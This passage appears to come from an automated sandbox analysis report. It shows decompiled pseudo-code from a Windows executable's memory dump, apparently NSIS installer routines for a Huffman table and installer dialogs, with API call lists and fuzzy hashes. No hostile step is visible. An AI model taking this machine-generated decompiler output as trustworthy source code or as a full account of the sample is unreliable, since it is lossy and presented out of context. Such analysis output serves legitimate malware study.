                						goto L64;
                					}
                					_v176 = _t168;
                					 *_t191 = _t269 + _t183;
                					_t192 = 0;
                					_t235 = _t234 - 1;
                					if(_t235 == 0) {
                						L21:
                						_t184 = _a4;
                						_t271 = 0;
                						do {
                							_t193 =  *_t184;
                							_t184 =  &(_t184[1]);
                							if(_t193 != _t168) {
                								_t232 = _t299 + _t193 * 4 - 0xb0;
                								_t236 =  *_t232;
                								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                								 *_t232 = _t236 + 1;
                							}
                							_t271 = _t271 + 1;
                						} while (_t271 < _a8);
                						_v16 = _v16 | 0xffffffff;
                						_v40 = _v40 & 0x00000000;
                						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                						_t195 = _v8;
                						_t186 =  ~_a28;
                						_v12 = _t168;
                						_v180 = _t168;
                						_v36 = 0x432190;
                						_v240 = _t168;
                						if(_t195 > _v28) {
                							L62:
                							_t168 = 0;
                							if(_v52 == 0 || _v28 == 1) {
                								return _t168;
                							} else {
                								goto L64;
                							}
                						}
                						_v44 = _t195 - 1;
                						_v32 = _t299 + _t195 * 4 - 0x70;
                						do {
                							_t282 =  *_v32;
                							if(_t282 == 0) {
                								goto L61;
                							}
                							while(1) {
                								_t283 = _t282 - 1;
                								_t200 = _a28 + _t186;
                								_v48 = _t283;
                								_v24 = _t200;
                								if(_v8 <= _t200) {
                									goto L45;
                								}
                								L31:
                								_v20 = _t283 + 1;
                								do {
                									_v16 = _v16 + 1;
                									_t296 = _v28 - _v24;
                									if(_t296 > _a28) {
                										_t296 = _a28;
                									}
                									_t222 = _v8 - _v24;
                									_t254 = 1 << _t222;
                									if(1 <= _v20) {
                										L40:
                										_t256 =  *_a36;
                										_t168 = 1 << _t222;
                										_v40 = 1;
                										_t274 = _t256 + 1;
                										if(_t274 > 0x5a0) {
                											goto L64;
                										}
                									} else {
                										_t275 = _v32;
                										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                										if(_t222 >= _t296) {
                											goto L40;
                										}
                										while(1) {
                											_t222 = _t222 + 1;
                											if(_t222 >= _t296) {
                												goto L40;
                											}
                											_t275 = _t275 + 4;
                											_t264 = _t263 + _t263;
                											_t175 =  *_t275;
                											if(_t264 <= _t175) {
                												goto L40;
                											}
                											_t263 = _t264 - _t175;
                										}
                										goto L40;
                									}
                									_t168 = _a32 + _t256 * 4;
                									_t297 = _t299 + _v16 * 4 - 0xec;
                									 *_a36 = _t274;
                									_t259 = _v16;
                									 *_t297 = _t168;
                									if(_t259 == 0) {
                										 *_a24 = _t168;
                									} else {
                										_t276 = _v12;
                										_t298 =  *((intOrPtr*)(_t297 - 4));
                										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                										_a5 = _a28;
                										_a4 = _t222;
                										_t262 = _t276 >> _t186;
                										_a6 = (_t168 - _t298 >> 2) - _t262;
                										 *(_t298 + _t262 * 4) = _a4;
                									}
                									_t224 = _v24;
                									_t186 = _t224;
                									_t225 = _t224 + _a28;
                									_v24 = _t225;
                								} while (_v8 > _t225);
                								L45:
                								_t284 = _v36;
                								_a5 = _v8 - _t186;
                								if(_t284 < 0x432190 + _a8 * 4) {
                									_t205 =  *_t284;
                									if(_t205 >= _a12) {
                										_t207 = _t205 - _a12 + _t205 - _a12;
                										_v36 =  &(_v36[1]);
                										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                										_t208 =  *((intOrPtr*)(_t207 + _a16));
                									} else {
                										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                										_t208 =  *_t284;
                										_v36 =  &(_t284[1]);
                									}
                									_a6 = _t208;
                								} else {
                									_a4 = 0xc0;
                								}
                								_t286 = 1 << _v8 - _t186;
                								_t244 = _v12 >> _t186;
                								while(_t244 < _v40) {
                									 *(_t168 + _t244 * 4) = _a4;
                									_t244 = _t244 + _t286;
                								}
                								_t287 = _v12;
                								_t246 = 1 << _v44;
                								while((_t287 & _t246) != 0) {
                									_t287 = _t287 ^ _t246;
                									_t246 = _t246 >> 1;
                								}
                								_t288 = _t287 ^ _t246;
                								_v20 = 1;
                								_v12 = _t288;
                								_t251 = _v16;
                								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                									L60:
                									if(_v48 != 0) {
                										_t282 = _v48;
                										_t283 = _t282 - 1;
                										_t200 = _a28 + _t186;
                										_v48 = _t283;
                										_v24 = _t200;
                										if(_v8 <= _t200) {
                											goto L45;
                										}
                										goto L31;
                									}
                									break;
                								} else {
                									goto L58;
                								}
                								do {
                									L58:
                									_t186 = _t186 - _a28;
                									_t251 = _t251 - 1;
                								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                								_v16 = _t251;
                								goto L60;
                							}
                							L61:
                							_v8 = _v8 + 1;
                							_v32 = _v32 + 4;
                							_v44 = _v44 + 1;
                						} while (_v8 <= _v28);
                						goto L62;
                					}
                					_t277 = 0;
                					do {
                						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                						_t277 = _t277 + 4;
                						_t235 = _t235 - 1;
                						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                					} while (_t235 != 0);
                					goto L21;
                				}
                				 *_a24 =  *_a24 & 0x00000000;
                				 *_a28 =  *_a28 & 0x00000000;
                				return 0;
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                				struct HWND__* _v8;
                				struct HWND__* _v12;
                				long _v16;
                				signed int _v20;
                				signed int _v24;
                				intOrPtr _v28;
                				signed char* _v32;
                				int _v36;
                				signed int _v44;
                				int _v48;
                				signed int* _v60;
                				signed char* _v64;
                				signed int _v68;
                				long _v72;
                				void* _v76;
                				intOrPtr _v80;
                				intOrPtr _v84;
                				void* _v88;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t198;
                				intOrPtr _t201;
                				long _t207;
                				signed int _t211;
                				signed int _t222;
                				void* _t225;
                				void* _t226;
                				int _t232;
                				long _t237;
                				long _t238;
                				signed int _t239;
                				signed int _t245;
                				signed int _t247;
                				signed char _t248;
                				signed char _t254;
                				void* _t258;
                				void* _t260;
                				signed char* _t278;
                				signed char _t279;
                				long _t284;
                				struct HWND__* _t291;
                				signed int* _t292;
                				int _t293;
                				long _t294;
                				signed int _t295;
                				void* _t297;
                				long _t298;
                				int _t299;
                				signed int _t300;
                				signed int _t303;
                				signed int _t311;
                				signed char* _t319;
                				int _t324;
                				void* _t326;
                
                				_t291 = _a4;
                				_v12 = GetDlgItem(_t291, 0x3f9);
                				_v8 = GetDlgItem(_t291, 0x408);
                				_t326 = SendMessageW;
                				_v24 =  *0x434f28;
                				_v28 =  *0x434f10 + 0x94;
                				if(_a8 != 0x110) {
                					L23:
                					if(_a8 != 0x405) {
                						_t301 = _a16;
                					} else {
                						_a12 = 0;
                						_t301 = 1;
                						_a8 = 0x40f;
                						_a16 = 1;
                					}
                					if(_a8 == 0x4e || _a8 == 0x413) {
                						_v16 = _t301;
                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                							if(( *0x434f19 & 0x00000002) != 0) {
                								L41:
                								if(_v16 != 0) {
                									_t237 = _v16;
                									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                									}
                									_t238 = _v16;
                									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                										_t301 = _v24;
                										_t239 =  *(_t238 + 0x5c);
                										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                										} else {
                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                										}
                									}
                								}
                								goto L48;
                							}
                							if(_a8 == 0x413) {
                								L33:
                								_t301 = 0 | _a8 != 0x00000413;
                								_t245 = E00404E54(_v8, _a8 != 0x413);
                								_t295 = _t245;
                								if(_t295 >= 0) {
                									_t94 = _v24 + 8; // 0x8
                									_t301 = _t245 * 0x818 + _t94;
                									_t247 =  *_t301;
                									if((_t247 & 0x00000010) == 0) {
                										if((_t247 & 0x00000040) == 0) {
                											_t248 = _t247 ^ 0x00000001;
                										} else {
                											_t254 = _t247 ^ 0x00000080;
                											if(_t254 >= 0) {
                												_t248 = _t254 & 0x000000fe;
                											} else {
                												_t248 = _t254 | 0x00000001;
                											}
                										}
                										 *_t301 = _t248;
                										E0040117D(_t295);
                										_a12 = _t295 + 1;
                										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                										_a8 = 0x40f;
                									}
                								}
                								goto L41;
                							}
                							_t301 = _a16;
                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                								goto L41;
                							}
                							goto L33;
                						} else {
                							goto L48;
                						}
                					} else {
                						L48:
                						if(_a8 != 0x111) {
                							L56:
                							if(_a8 == 0x200) {
                								SendMessageW(_v8, 0x200, 0, 0);
                							}
                							if(_a8 == 0x40b) {
                								_t225 =  *0x42d24c;
                								if(_t225 != 0) {
                									ImageList_Destroy(_t225);
                								}
                								_t226 =  *0x42d260;
                								if(_t226 != 0) {
                									GlobalFree(_t226);
                								}
                								 *0x42d24c = 0;
                								 *0x42d260 = 0;
                								 *0x434f60 = 0;
                							}
                							if(_a8 != 0x40f) {
                								L90:
                								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                									_t324 = (0 | _a16 == 0x00000020) << 3;
                									ShowWindow(_v8, _t324);
                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                								}
                								goto L93;
                							} else {
                								E004011EF(_t301, 0, 0);
                								_t198 = _a12;
                								if(_t198 != 0) {
                									if(_t198 != 0xffffffff) {
                										_t198 = _t198 - 1;
                									}
                									_push(_t198);
                									_push(8);
                									E00404ED4();
                								}
                								if(_a16 == 0) {
                									L75:
                									E004011EF(_t301, 0, 0);
                									_v36 =  *0x42d260;
                									_t201 =  *0x434f28;
                									_v64 = 0xf030;
                									_v24 = 0;
                									if( *0x434f2c <= 0) {
                										L86:
                										if( *0x434fbe == 0x400) {
                											InvalidateRect(_v8, 0, 1);
                										}
                										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                										}
                										goto L90;
                									}
                									_t292 = _t201 + 8;
                									do {
                										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                										if(_t207 != 0) {
                											_t303 =  *_t292;
                											_v72 = _t207;
                											_v76 = 8;
                											if((_t303 & 0x00000001) != 0) {
                												_v76 = 9;
                												_v60 =  &(_t292[4]);
                												_t292[0] = _t292[0] & 0x000000fe;
                											}
                											if((_t303 & 0x00000040) == 0) {
                												_t211 = (_t303 & 0x00000001) + 1;
                												if((_t303 & 0x00000010) != 0) {
                													_t211 = _t211 + 3;
                												}
                											} else {
                												_t211 = 3;
                											}
                											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                											SendMessageW(_v8, 0x113f, 0,  &_v76);
                										}
                										_v24 = _v24 + 1;
                										_t292 =  &(_t292[0x206]);
                									} while (_v24 <  *0x434f2c);
                									goto L86;
                								} else {
                									_t293 = E004012E2( *0x42d260);
                									E00401299(_t293);
                									_t222 = 0;
                									_t301 = 0;
                									if(_t293 <= 0) {
                										L74:
                										SendMessageW(_v12, 0x14e, _t301, 0);
                										_a16 = _t293;
                										_a8 = 0x420;
                										goto L75;
                									} else {
                										goto L71;
                									}
                									do {
                										L71:
                										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                											_t301 = _t301 + 1;
                										}
                										_t222 = _t222 + 1;
                									} while (_t222 < _t293);
                									goto L74;
                								}
                							}
                						}
                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                							goto L93;
                						} else {
                							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                							if(_t232 == 0xffffffff) {
                								goto L93;
                							}
                							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                								_t294 = 0x20;
                							}
                							E00401299(_t294);
                							SendMessageW(_a4, 0x420, 0, _t294);
                							_a12 = _a12 | 0xffffffff;
                							_a16 = 0;
                							_a8 = 0x40f;
                							goto L56;
                						}
                					}
                				} else {
                					_v36 = 0;
                					_v20 = 2;
                					 *0x434f60 = _t291;
                					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                					 *0x42d254 =  *0x42d254 | 0xffffffff;
                					_t297 = _t258;
                					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                					 *0x42d24c = _t260;
                					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                						SendMessageW(_v8, 0x111b, 0x10, 0);
                					}
                					DeleteObject(_t297);
                					_t298 = 0;
                					do {
                						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                							if(_t298 != 0x20) {
                								_v20 = 0;
                							}
                							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                						}
                						_t298 = _t298 + 1;
                					} while (_t298 < 0x21);
                					_t299 = _a16;
                					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                					_push(0x15);
                					E00404499(_a4);
                					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                					_push(0x16);
                					E00404499(_a4);
                					_t300 = 0;
                					_v16 = 0;
                					if( *0x434f2c <= 0) {
                						L19:
                						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                						goto L20;
                					} else {
                						_t319 = _v24 + 8;
                						_v32 = _t319;
                						do {
                							_t278 =  &(_t319[0x10]);
                							if( *_t278 != 0) {
                								_v64 = _t278;
                								_t279 =  *_t319;
                								_v88 = _v16;
                								_t311 = 0x20;
                								_v84 = 0xffff0002;
                								_v80 = 0xd;
                								_v68 = _t311;
                								_v44 = _t300;
                								_v72 = _t279 & _t311;
                								if((_t279 & 0x00000002) == 0) {
                									if((_t279 & 0x00000004) == 0) {
                										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                									} else {
                										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                									}
                								} else {
                									_v80 = 0x4d;
                									_v48 = 1;
                									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                									_v36 = 1;
                									 *( *0x42d260 + _t300 * 4) = _t284;
                									_v16 =  *( *0x42d260 + _t300 * 4);
                								}
                							}
                							_t300 = _t300 + 1;
                							_t319 =  &(_v32[0x818]);
                							_v32 = _t319;
                						} while (_t300 <  *0x434f2c);
                						if(_v36 != 0) {
                							L20:
                							if(_v20 != 0) {
                								E004044CE(_v8);
                								goto L23;
                							} else {
                								ShowWindow(_v12, 5);
                								E004044CE(_v12);
                								L93:
                								return E00404500(_a8, _a12, _a16);
                							}
                						}
                						goto L19;
                					}
                				}
                			}

                APIs
                • GetDlgItem.USER32 ref: 00404F1E
                • GetDlgItem.USER32 ref: 00404F29
                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                • LoadImageW.USER32 ref: 00404F8A
                • SetWindowLongW.USER32 ref: 00404FA3
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                • DeleteObject.GDI32(00000000), ref: 00405000
                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                • SetWindowLongW.USER32 ref: 00405152
                • ShowWindow.USER32(?,00000005), ref: 00405162
                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                • GlobalFree.KERNEL32 ref: 00405340
                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                • ShowWindow.USER32(?,00000000), ref: 004054EA
                • GetDlgItem.USER32 ref: 004054F5
                • ShowWindow.USER32(00000000), ref: 004054FC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp
                Similarity
                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                • String ID: $M$N
                • API String ID: 2564846305-813528018
                • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                				struct HWND__* _v28;
                				void* _v84;
                				void* _v88;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t34;
                				signed int _t36;
                				signed int _t38;
                				struct HWND__* _t48;
                				signed int _t67;
                				struct HWND__* _t73;
                				signed int _t86;
                				struct HWND__* _t91;
                				signed int _t99;
                				int _t103;
                				signed int _t117;
                				int _t118;
                				int _t122;
                				signed int _t124;
                				struct HWND__* _t127;
                				struct HWND__* _t128;
                				int _t129;
                				intOrPtr _t130;
                				long _t133;
                				int _t135;
                				int _t136;
                				void* _t137;
                
                				_t130 = _a8;
                				if(_t130 == 0x110 || _t130 == 0x408) {
                					_t34 = _a12;
                					_t127 = _a4;
                					__eflags = _t130 - 0x110;
                					 *0x42d250 = _t34;
                					if(_t130 == 0x110) {
                						 *0x434f08 = _t127;
                						 *0x42d264 = GetDlgItem(_t127, 1);
                						_t91 = GetDlgItem(_t127, 2);
                						_push(0xffffffff);
                						_push(0x1c);
                						 *0x42b230 = _t91;
                						E00404499(_t127);
                						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                						 *0x433ecc = E0040140B(4);
                						_t34 = 1;
                						__eflags = 1;
                						 *0x42d250 = 1;
                					}
                					_t124 =  *0x40a368; // 0xffffffff
                					_t136 = 0;
                					_t133 = (_t124 << 6) +  *0x434f20;
                					__eflags = _t124;
                					if(_t124 < 0) {
                						L36:
                						E004044E5(0x40b);
                						while(1) {
                							_t36 =  *0x42d250;
                							 *0x40a368 =  *0x40a368 + _t36;
                							_t133 = _t133 + (_t36 << 6);
                							_t38 =  *0x40a368; // 0xffffffff
                							__eflags = _t38 -  *0x434f24;
                							if(_t38 ==  *0x434f24) {
                								E0040140B(1);
                							}
                							__eflags =  *0x433ecc - _t136;
                							if( *0x433ecc != _t136) {
                								break;
                							}
                							__eflags =  *0x40a368 -  *0x434f24; // 0xffffffff
                							if(__eflags >= 0) {
                								break;
                							}
                							_t117 =  *(_t133 + 0x14);
                							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                							_push( *((intOrPtr*)(_t133 + 0x20)));
                							_push(0xfffffc19);
                							E00404499(_t127);
                							_push( *((intOrPtr*)(_t133 + 0x1c)));
                							_push(0xfffffc1b);
                							E00404499(_t127);
                							_push( *((intOrPtr*)(_t133 + 0x28)));
                							_push(0xfffffc1a);
                							E00404499(_t127);
                							_t48 = GetDlgItem(_t127, 3);
                							__eflags =  *0x434f8c - _t136;
                							_v28 = _t48;
                							if( *0x434f8c != _t136) {
                								_t117 = _t117 & 0x0000fefd | 0x00000004;
                								__eflags = _t117;
                							}
                							ShowWindow(_t48, _t117 & 0x00000008);
                							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                							E004044BB(_t117 & 0x00000002);
                							_t118 = _t117 & 0x00000004;
                							EnableWindow( *0x42b230, _t118);
                							__eflags = _t118 - _t136;
                							if(_t118 == _t136) {
                								_push(1);
                							} else {
                								_push(_t136);
                							}
                							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                							__eflags =  *0x434f8c - _t136;
                							if( *0x434f8c == _t136) {
                								_push( *0x42d264);
                							} else {
                								SendMessageW(_t127, 0x401, 2, _t136);
                								_push( *0x42b230);
                							}
                							E004044CE();
                							E0040653D(0x42d268, E00403F7B());
                							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                							SetWindowTextW(_t127, 0x42d268);
                							_push(_t136);
                							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                							__eflags = _t67;
                							if(_t67 != 0) {
                								continue;
                							} else {
                								__eflags =  *_t133 - _t136;
                								if( *_t133 == _t136) {
                									continue;
                								}
                								__eflags =  *(_t133 + 4) - 5;
                								if( *(_t133 + 4) != 5) {
                									DestroyWindow( *0x433ed8);
                									 *0x42c240 = _t133;
                									__eflags =  *_t133 - _t136;
                									if( *_t133 <= _t136) {
                										goto L60;
                									}
                									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *(0x40a36c +  *(_t133 + 4) * 4), _t133);
                									__eflags = _t73 - _t136;
                									 *0x433ed8 = _t73;
                									if(_t73 == _t136) {
                										goto L60;
                									}
                									_push( *((intOrPtr*)(_t133 + 0x2c)));
                									_push(6);
                									E00404499(_t73);
                									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                									ScreenToClient(_t127, _t137 + 0x10);
                									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                									_push(_t136);
                									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                									__eflags =  *0x433ecc - _t136;
                									if( *0x433ecc != _t136) {
                										goto L63;
                									}
                									ShowWindow( *0x433ed8, 8);
                									E004044E5(0x405);
                									goto L60;
                								}
                								__eflags =  *0x434f8c - _t136;
                								if( *0x434f8c != _t136) {
                									goto L63;
                								}
                								__eflags =  *0x434f80 - _t136;
                								if( *0x434f80 != _t136) {
                									continue;
                								}
                								goto L63;
                							}
                						}
                						DestroyWindow( *0x433ed8);
                						 *0x434f08 = _t136;
                						EndDialog(_t127,  *0x42ba38);
                						goto L60;
                					} else {
                						__eflags = _t34 - 1;
                						if(_t34 != 1) {
                							L35:
                							__eflags =  *_t133 - _t136;
                							if( *_t133 == _t136) {
                								goto L63;
                							}
                							goto L36;
                						}
                						_push(0);
                						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                						__eflags = _t86;
                						if(_t86 == 0) {
                							goto L35;
                						}
                						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                						__eflags =  *0x433ecc;
                						return 0 |  *0x433ecc == 0x00000000;
                					}
                				} else {
                					_t127 = _a4;
                					_t136 = 0;
                					if(_t130 == 0x47) {
                						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                					}
                					_t122 = _a12;
                					if(_t130 != 5) {
                						L8:
                						if(_t130 != 0x40d) {
                							__eflags = _t130 - 0x11;
                							if(_t130 != 0x11) {
                								__eflags = _t130 - 0x111;
                								if(_t130 != 0x111) {
                									goto L28;
                								}
                								_t135 = _t122 & 0x0000ffff;
                								_t128 = GetDlgItem(_t127, _t135);
                								__eflags = _t128 - _t136;
                								if(_t128 == _t136) {
                									L15:
                									__eflags = _t135 - 1;
                									if(_t135 != 1) {
                										__eflags = _t135 - 3;
                										if(_t135 != 3) {
                											_t129 = 2;
                											__eflags = _t135 - _t129;
                											if(_t135 != _t129) {
                												L27:
                												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                												goto L28;
                											}
                											__eflags =  *0x434f8c - _t136;
                											if( *0x434f8c == _t136) {
                												_t99 = E0040140B(3);
                												__eflags = _t99;
                												if(_t99 != 0) {
                													goto L28;
                												}
                												 *0x42ba38 = 1;
                												L23:
                												_push(0x78);
                												L24:
                												E00404472();
                												goto L28;
                											}
                											E0040140B(_t129);
                											 *0x42ba38 = _t129;
                											goto L23;
                										}
                										__eflags =  *0x40a368 - _t136; // 0xffffffff
                										if(__eflags <= 0) {
                											goto L27;
                										}
                										_push(0xffffffff);
                										goto L24;
                									}
                									_push(_t135);
                									goto L24;
                								}
                								SendMessageW(_t128, 0xf3, _t136, _t136);
                								_t103 = IsWindowEnabled(_t128);
                								__eflags = _t103;
                								if(_t103 == 0) {
                									L63:
                									return 0;
                								}
                								goto L15;
                							}
                							SetWindowLongW(_t127, _t136, _t136);
                							return 1;
                						}
                						DestroyWindow( *0x433ed8);
                						 *0x433ed8 = _t122;
                						L60:
                						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
                							ShowWindow(_t127, 0xa);
                							 *0x42f268 = 1;
                						}
                						goto L63;
                					} else {
                						asm("sbb eax, eax");
                						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                							L28:
                							return E00404500(_a8, _t122, _a16);
                						} else {
                							ShowWindow(_t127, 4);
                							goto L8;
                						}
                					}
                				}
                			}

                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                • ShowWindow.USER32(?), ref: 00403FF6
                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                • ShowWindow.USER32(?,00000004), ref: 00404021
                • DestroyWindow.USER32 ref: 00404035
                • SetWindowLongW.USER32 ref: 0040404E
                • GetDlgItem.USER32 ref: 0040406D
                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                • IsWindowEnabled.USER32(00000000), ref: 00404088
                • GetDlgItem.USER32 ref: 00404133
                • GetDlgItem.USER32 ref: 0040413D
                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                • GetDlgItem.USER32 ref: 0040424E
                • ShowWindow.USER32(00000000,?), ref: 0040426F
                • EnableWindow.USER32(?,?), ref: 00404281
                • EnableWindow.USER32(?,?), ref: 0040429C
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                • EnableMenuItem.USER32 ref: 004042B9
